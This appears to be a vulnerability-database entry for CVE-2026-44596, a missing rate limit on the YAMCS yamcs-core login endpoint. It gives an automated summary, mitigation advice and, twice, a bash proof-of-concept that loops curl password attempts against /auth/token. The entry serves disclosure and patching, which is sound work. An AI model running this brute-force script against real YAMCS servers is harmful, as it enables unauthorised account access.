YAMCS yamcs-core 5.12.7 - No Rate Limiting
YAMCS yamcs-core versions prior to 5. 12. 7 suffer from a lack of rate limiting, which can allow excessive requests to the service. This issue is classified as medium severity and affects Linux platforms. Exploit code is available in bash, but no known exploits are reported in the wild. The vulnerability was disclosed with no direct patch link provided, but version 5. 12. 7 is indicated as the fixed version.
AI Analysis
Technical Summary
The vulnerability identified as CVE-2026-44596 affects YAMCS yamcs-core versions before 5.12.7. It involves the absence of rate limiting controls, potentially allowing attackers to flood the service with requests. This can degrade service availability or lead to denial-of-service conditions. The issue is specific to Linux deployments of the software. Exploit code exists in bash, demonstrating the feasibility of exploitation. The vendor project site and source code repository are publicly available, but no explicit vendor advisory or patch link was provided in the input data.
Potential Impact
Without rate limiting, the affected YAMCS yamcs-core instances may be vulnerable to resource exhaustion or denial-of-service attacks caused by excessive request volumes. This can impact service availability and reliability. There is no evidence of known exploits in the wild at this time.
Mitigation Recommendations
Upgrade to YAMCS yamcs-core version 5.12.7 or later, where the rate limiting issue has been addressed. Since no official patch link or advisory was provided, verify the fix by consulting the vendor's official resources at https://yamcs.org or the GitHub repository. No additional mitigation steps are indicated by the vendor advisory content.
Indicators of Compromise
- exploit-code: # Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-44596 # Category: Remote / Brute Force # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4 #!/bin/bash # ============================================================ # CVE-2026-44596 — YAMCS No Rate Limiting on /auth/token # ============================================================ # Vulnerability: POST /auth/token accepts unlimited login # attempts with no rate limiting or lockout. # Impact: Unauthenticated brute-force of any account. # Affected: yamcs-core < 5.12.7 # Fixed in: yamcs-core 5.12.7 # CWE: CWE-307 # CVSS: 5.3 MEDIUM # ============================================================ # Usage: ./poc.sh [target] [username] [attempts] # Example: ./poc.sh http://localhost:8090 operator 20 # ============================================================ TARGET="${1:-http://localhost:8090}" USERNAME="${2:-operator}" ATTEMPTS="${3:-20}" LAST_STATUS="" echo "============================================================" echo " CVE-2026-44596 — YAMCS No Rate Limiting PoC" echo " Target: $TARGET" echo " Username: $USERNAME" echo " Attempts: $ATTEMPTS" echo "============================================================" echo "" echo "[*] Sending $ATTEMPTS unauthenticated login attempts..." echo "[*] Vulnerable: HTTP 401 every time, never HTTP 429" echo "" for i in $(seq 1 $ATTEMPTS); do RESPONSE=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST "$TARGET/auth/token" \ -H "Content-Type: application/x-www-form-urlencoded" \ -d "grant_type=password&username=$USERNAME&password=wrongpass$i") echo " Attempt $i/$ATTEMPTS: HTTP $RESPONSE" LAST_STATUS=$RESPONSE if [ "$RESPONSE" = "429" ]; then echo "" echo "[+] HTTP 429 received — rate limiting active (PATCHED)" exit 0 fi if [ "$RESPONSE" = "200" ]; then echo "" echo "[!!!] HTTP 200 — credentials found at attempt $i" exit 0 fi done echo "" if [ "$LAST_STATUS" = "401" ]; then echo "[!!!] VULNERABLE: $ATTEMPTS attempts, no rate limiting detected" echo "[!!!] Brute-force possible without restriction" fi echo "" echo "============================================================" echo " Fix: Upgrade to yamcs-core >= 5.12.7" echo "============================================================"
YAMCS yamcs-core 5.12.7 - No Rate Limiting
Description
YAMCS yamcs-core versions prior to 5. 12. 7 suffer from a lack of rate limiting, which can allow excessive requests to the service. This issue is classified as medium severity and affects Linux platforms. Exploit code is available in bash, but no known exploits are reported in the wild. The vulnerability was disclosed with no direct patch link provided, but version 5. 12. 7 is indicated as the fixed version.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The vulnerability identified as CVE-2026-44596 affects YAMCS yamcs-core versions before 5.12.7. It involves the absence of rate limiting controls, potentially allowing attackers to flood the service with requests. This can degrade service availability or lead to denial-of-service conditions. The issue is specific to Linux deployments of the software. Exploit code exists in bash, demonstrating the feasibility of exploitation. The vendor project site and source code repository are publicly available, but no explicit vendor advisory or patch link was provided in the input data.
Potential Impact
Without rate limiting, the affected YAMCS yamcs-core instances may be vulnerable to resource exhaustion or denial-of-service attacks caused by excessive request volumes. This can impact service availability and reliability. There is no evidence of known exploits in the wild at this time.
Mitigation Recommendations
Upgrade to YAMCS yamcs-core version 5.12.7 or later, where the rate limiting issue has been addressed. Since no official patch link or advisory was provided, verify the fix by consulting the vendor's official resources at https://yamcs.org or the GitHub repository. No additional mitigation steps are indicated by the vendor advisory content.
Technical Details
- Cve
- CVE-2026-44596
- Version
- < 5.12.7
- Vendor
- https://yamcs.org
- Application
- https://github.com/yamcs/yamcs
- Author
- Daniel Miranda Barcelona
- Platform
- Linux
- Edb Id
- 52605
- Has Exploit Code
- true
- Code Language
- bash
Indicators of Compromise
Exploit Source Code
Exploit code for YAMCS yamcs-core 5.12.7 - No Rate Limiting
# Exploit Title: YAMCS yamcs-core 5.12.7 - No Rate Limiting # Date: 2026-05-27 # Exploit Author: Daniel Miranda Barcelona (Excal1bur) # Vendor Homepage: https://yamcs.org # Software Link: https://github.com/yamcs/yamcs # Version: < 5.12.7 # Tested on: Linux # CVE: CVE-2026-44596 # Category: Remote / Brute Force # Advisory: https://github.com/yamcs/yamcs/security/advisories/GHSA-w5r6-mcgq-7pq4 #!/bin/bash # ============================================================ # CVE-2026-44596 — YAMCS N... (2138 more characters)
Threat ID: 6a1b58ece29bf47b508cc6f5
Added to database: 5/30/2026, 9:38:52 PM
Last enriched: 5/30/2026, 9:39:01 PM
Last updated: 5/31/2026, 2:10:27 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.